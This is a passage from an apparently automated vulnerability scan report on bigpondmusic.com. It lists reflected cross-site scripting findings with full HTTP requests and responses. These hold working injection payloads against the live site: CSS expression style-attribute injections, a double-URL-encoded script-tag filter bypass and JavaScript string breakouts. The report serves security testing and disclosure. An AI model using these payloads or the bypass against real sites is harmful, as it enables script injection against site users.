This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nelly/5-0-deluxe?5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?5eeab"style="x:expression(alert(1))"e125ad515ce=1" />
...[SNIP]...

2.104. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7a0'%3b8f38f26f47a was submitted in the REST URL parameter 1. This input was echoed as 5e7a0';8f38f26f47a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5e7a0'%3b8f38f26f47a/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5e7a0';8f38f26f47a';
   s.prop4 = 'nelly';
   s.prop5 = 'just-a-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.105. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71 was submitted in the REST URL parameter 1. This input was echoed as 6c1b8"><script>alert(1)</script>e4c93957b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and the application's own second decode then produces <.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88200


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album6c1b8"><script>alert(1)</script>e4c93957b71/nelly/just-a-dream2" />
...[SNIP]...

2.106. http://bigpondmusic.com/album/nelly/just-a-dream2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa568"style%3d"x%3aexpression(alert(1))"61488da52ac was submitted in the h parameter. This input was echoed as fa568"style="x:expression(alert(1))"61488da52ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nelly/just-a-dream2?h=726722803fa568"style%3d"x%3aexpression(alert(1))"61488da52ac HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?h=726722803fa568"style="x:expression(alert(1))"61488da52ac" />
...[SNIP]...

2.107. http://bigpondmusic.com/album/nelly/just-a-dream2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba87f"style="x:expression(alert(1))"31c7e4dd0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nelly/just-a-dream2?ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103886


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?ba87f"style="x:expression(alert(1))"31c7e4dd0c=1" />
...[SNIP]...

2.108. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6490e'%3b7485f0ca9f5 was submitted in the REST URL parameter 1. This input was echoed as 6490e';7485f0ca9f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album6490e'%3b7485f0ca9f5/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88121


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album6490e';7485f0ca9f5';
   s.prop4 = 'nicole-scherzinger';
   s.prop5 = 'poison4';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.109. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f was submitted in the REST URL parameter 1. This input was echoed as c62ff"><script>alert(1)</script>279f4e1735f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and the application's own second decode then produces <.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc62ff"><script>alert(1)</script>279f4e1735f/nicole-scherzinger/poison4" />
...[SNIP]...

2.110. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b was submitted in the h parameter. This input was echoed as 5f969"style="x:expression(alert(1))"18b7bf8d52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nicole-scherzinger/poison4?h=7653777365f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?h=7653777365f969"style="x:expression(alert(1))"18b7bf8d52b" />
...[SNIP]...

2.111. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4465f"style="x:expression(alert(1))"01d427eeef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nicole-scherzinger/poison4?4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?4465f"style="x:expression(alert(1))"01d427eeef0=1" />
...[SNIP]...

2.112. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3921'%3b1df4e93a53 was submitted in the REST URL parameter 1. This input was echoed as c3921';1df4e93a53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc3921'%3b1df4e93a53/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87896


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc3921';1df4e93a53';
   s.prop4 = 'p-nk';
   s.prop5 = 'greatest-hits-so-far';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.113. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3 was submitted in the REST URL parameter 1. This input was echoed as 8ed0f"><script>alert(1)</script>50a9fabc3f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8ed0f"><script>alert(1)</script>50a9fabc3f3/p-nk/greatest-hits-so-far" />
...[SNIP]...

2.114. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b739"style="x:expression(alert(1))"0516aff5a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/greatest-hits-so-far?2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
